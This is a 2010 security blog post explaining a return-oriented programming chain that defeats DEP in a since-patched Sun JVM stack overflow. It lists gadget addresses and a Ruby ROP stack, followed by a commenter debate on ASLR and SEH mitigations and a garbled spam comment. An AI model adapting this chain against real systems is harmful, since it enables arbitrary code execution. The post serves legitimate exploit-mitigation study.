Monday, 12 April 2010

A little return oriented exploitation on Windows x86 (Part 1)

This post will take a look at how Return Oriented Programming (ROP) can be used on x86 Windows in order to bypass DEP and gain arbitrary code execution. The example I will use is from an exploit I wrote last year for a stack based buffer overflow I found in the Sun Java Virtual Machine which was recently patched and disclosed by TippingPoint's ZDI. (ZDI-10-061). Part 2 of this blog post will look at an experimental compiler convention that aims to mitigate return oriented attacks such as the one presented here.

It should be noted that a ROP attack against the JVM is not wholly required due to the JVM employing an executable heap, allowing an attacker to easily circumvent DEP and ASLR through heap spraying with a high degree of reliability, however it still makes for an interesting case study.

Getting Our Bearings
The cmm!readMabCurveData bug (which I wont be discussing specifically in this post) is a vanilla stack based buffer overflow vulnerability whereby we end up gaining EIP control via an overwritten return address and we control a large portion of data on the stack, pointed to by ESP. ESI will also be pointing near our shellcode buffer which has been placed on the stack.

Assuming ASLR is in place we need to locate the address of a suitable image(s) in memory so as we can begin to create some gadgets. Conveniently the JVM applies no relocation to most of its modules, so we can use static base addresses for most of the modules used. In other scenarios we would need to leverage a memory leak, or similar, in order to first discover a suitable module's address in memory.

The Plan
We will execute the following pseudo C code via several gadgets in order to bypass DEP and execute shellcode:

// we start with a pointer that is near-ish our shellcode (held in ESI at the time we get control)
extern BYTE * pNonExecutableShellcode;
// first we will modify this pointer to point into our shellcode buffer
pNonExecutableShellcode -= 8192;
// we will then proceed to allocate some read/write/executable memory...
pExecutableMemory = VirtualAlloc( 0, 0x4000, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// and then copy our shellcode into this executable memory...
memmove( pExecutableMemory, pNonExecutableShellcode, 0x3000 );
// finally we can execute the shellcode...

In total it will take 10 gadgets to perform the above.

The Gadgets
We pick the module jvm.dll (version 1.6.0_14 at the original time of writing) which has a fixed base address of 0x6D800000 and will not be relocated.

First we calculate a pointer to the shellcode on the stack...

// (1) when we first return we must remove 3 DWORD's from stack (previous stack frames parameters which were altered)
0x6D8011AC: add esp, 12
0x6D8011AF: ret

// (2) get in some needed registers...
// ESI = pointer to stack just below shellcode
0x6D8FF623: mov edx, esi // save ESI into EDX for later
0x6D8FF625: pop esi // (2.A) unused
0x6D8FF626: mov eax, ebx
0x6D8FF628: pop ebx // (2.B) unused
0x6D8FF629: pop ebp // (2.C) unused
0x6D8FF62A: retn 12

// (3) set ECX to the stack adjust size
0x6D81BDD7: pop ecx // (3.A) 0x00002000
0x6D81BDD8: ret

// (4) set EDI = address where we save the shellcode address
0x6D802A88: pop edi // (4.A) 0x6DA612CC
0x6D802A89: ret

// (5) sub EDX, ECX to point to the shellcode buffer...
// ECX = size: 8192
// EDX = pointer to stack below shellcode (around ESP)
// EDI = writeable address
0x6D97ED06: sub edx, ecx // calculate address of shellcode
0x6D97ED08: mov [edi], edx // save it for later
0x6D97ED0A: pop edi // (5.A) unused
0x6D97ED0B: pop esi // (5.B) unused
0x6D97ED0C: pop ebp // (5.C) unused
0x6D97ED0D: retn 12

Now we VirtualAlloc a RWX buffer...

// (6) we just call a whole function here, ret2libc style...
0x6D970A50: push ebp
0x6D970A51: mov ebp, esp
0x6D970A53: mov eax, [ebp+12] // (6.B) allocation size: 0x00004000
0x6D970A56: test eax, eax
0x6D970A58: jnz short 0x6D970A5E
0x6D970A5A: mov al, 1
0x6D970A5C: pop ebp
0x6D970A5D: retn
0x6D970A5E: push 0x40 // PAGE_EXECUTE_READWRITE
0x6D970A60: push 0x1000 // MEM_COMMIT
0x6D970A65: push eax
0x6D970A66: mov eax, [ebp+8] // (6.A) allocation address: 0x00000000
0x6D970A69: push eax
0x6D970A6A: call VirtualAlloc
0x6D970A70: test eax, eax
0x6D970A72: setnz al
0x6D970A75: pop ebp
0x6D970A76: ret

// (7) reuse gadget 1 and advance past the two arguments used for the above function call in gadget 6
0x6D8011AC: add esp, 12
0x6D8011AF: ret

Now we memmove the shellcode into the new RWX buffer...

// (8) move the new RWX buffer EAX into ECX for the upcoming memmove...
0x6D824C7C: mov ecx, eax
0x6D824C7E: mov eax, [ecx+20]
0x6D824C81: add esp, 4
0x6D824C84: add eax, ecx
0x6D824C86: pop ebp
0x6D824C87: ret

// (9) set EAX to our shellcode buffer on stack, which we stored in gadget 5
0x6D808150: mov eax, dword ptr [0x6DA612CC]
0x6D808155: retn 8

// (10) perform the memmove, returning the destination buffer in EAX
// the memmove size amount is a param we have already placed on stack.
0x6D85A181: push eax // the source address (shellcode on stack)
0x6D85A182: push ecx // the destination address (new RWX buffer)
0x6D85A183: call memmove // memmove returns the dest address in EAX
0x6D85A189: add esp, 12
0x6D85A18C: pop ebp // (10.A) unused
0x6D85A18D: ret

Finally we can execute the shellcode...

// (11) EAX is the RWX shellcode buffer so jump into it...
0x6D96FA23: jmp eax

The Call Stack
Using the above we construct a call stack which includes the return addresses, parameters and padding bytes as shown below in Ruby:

# when we get EIP control we use this...
eip = [0x6D8011AC].pack('V') # (1) return to stack fix up

# prior to the stack fix up, ESP will point to this...
# (the first 3 dwords are parameters from the last function call)
rop = [0x00000000].pack('V') # null to avoid crashing
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6DA612CC].pack('V') # writeable memory to avoid crashing
rop << [0x6D8FF623].pack('V') # (2) return to register load
rop << [0xAAAAAAAA].pack('V') # (2.A) ESI, unused
rop << [0xAAAAAAAA].pack('V') # (2.B) EBX, unused
rop << [0xAAAAAAAA].pack('V') # (2.C) EBP, unused
rop << [0x6D81BDD7].pack('V') # (3)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x00002000].pack('V') # (3.A) ECX, subtract from EDX to point to shellcode
rop << [0x6D802A88].pack('V') # (4)
rop << [0x6DA612CC].pack('V') # (4.A) EDI, address to save shellcode pointer
rop << [0x6D97ED06].pack('V') # (5)
rop << [0xAAAAAAAA].pack('V') # (5.A) EDI, unused
rop << [0xAAAAAAAA].pack('V') # (5.B) ESI, unused
rop << [0xAAAAAAAA].pack('V') # (5.C) EBP, unused
rop << [0x6D970A50].pack('V') # (6)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D8011AC].pack('V') # (7)
rop << [0x00000000].pack('V') # (6.A) null to alloc anywhere
rop << [0x00004000].pack('V') # (6.B) alloc_size
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D824C7C].pack('V') # (8)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D808150].pack('V') # (9)
rop << [0x6D85A181].pack('V') # (10)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x00003000].pack('V') # memmove size (<= alloc_size - 1)
rop << [0xAAAAAAAA].pack('V') # (10.A) unused
rop << [0x6D96FA23].pack('V') # (11) exec shellcode

In this particular example, exploitation would have been harder if first the /GS compiler switch had been used (assuming Visual Studio is being used for compilation) as we would not have been able to gain initial EIP control via the overwritten return address. However due to a limitation in the /GS protection we would still be able to get EIP control via an overwritten structured exception handler. Had /DYNAMICBASE been employed for the jvm.dll module (and all other modules loaded in the target process) we would not be able to rely on the static addresses used above. Instead we would need to determine at run time the base address of the jvm.dll before constructing the ROP call stack.

Next week part 2 of this post will look at a simple compile time convention I have been experimenting with to help mitigate return oriented attacks.


jf said...

There's a mitigation that already exists, it's called ASLR.

And no, you wouldn't have been able to corrupt the SEH handler, there's two more mitigations, called SafeSEH and SEHOP.

Stephen Fewer said...

@jf: ASLR can often be circumvented via mem leaks, known modules not using ASLR (nspr4.dll in Firefox/Thunderbird for example), heap spraying and so on. SafeSEH has never stopped me writing an exploit before, but SEHOP is a greater improvement to be fair.

jf said...

Ah, so in order to work, you need a broken ASLR implementation...

And, heap spraying? Seriously? You know you still need to know a heap address right?

Stephen Fewer said...

"Ah, so in order to work, you need a broken ASLR implementation..."

...and the vulnerable software had a broken ASLR implementation?! (this post being an example of an attack against a specific bug and not a generic technique)

"And, heap spraying? Seriously? You know you still need to know a heap address right?"

I mentioned it in general, but sure of course. An interesting example of using heap spraying in IE8 to get an address for a predictable pattern is Peter Vreugdenhil's writeup on his pwn2own bug:

jf said...

re: jvm bug

Fair enough, to some degree you are getting the ire of dealing with a fair number of people as of late that are all "rop! rop!". Part of this is that a shadow stack seems like overkill for a secondary problem. That said, a shadow stack is something I've long argued for, as it helps keep my viewpoint of separating metadata and data into non-contiguous regions.

That said, my point was more to that effect-- a properly implemented ASLR effectively mitigates the complication, albeit not a fool proof one (what is?).

I am familiar with both the IE8 stuff and heap-spraying. I think you're misunderstanding. It's not a technique that fixes or really helps with ASLR, it's meant to more mitigate 'heap rift', *any* valid heap address is valid for your use (or as close to it as possible), not just a specific one-- think of it more as eliminating offsets than mitigating ASLR.

The bug in question required a memory leak of a null terminated string (get c++ ptr, heap addr)and the fixed address of ATL (ret into vprotect), without them there was no rop; beautiful bugs are beautiful bugs (s/bugs/exploits/), dont get me wrong, its just imho the beauty was the chaining of conditions together, of which I am not so much referencing the chaining together of function epilogues.

Either way, you're getting more from me than I meant, call it a frustration on the subject improperly vented.

custom essay said...

@jf: ASLR can regularly be dodged via mem holes, known modules not utilizing ASLR (nspr4.dll in Firefox/Thunderbird case in point), load spraying et cetera. SafeSEH has never stopped me composing an adventure ever, but SEHOP is a more fantastic enhancement to be reasonable.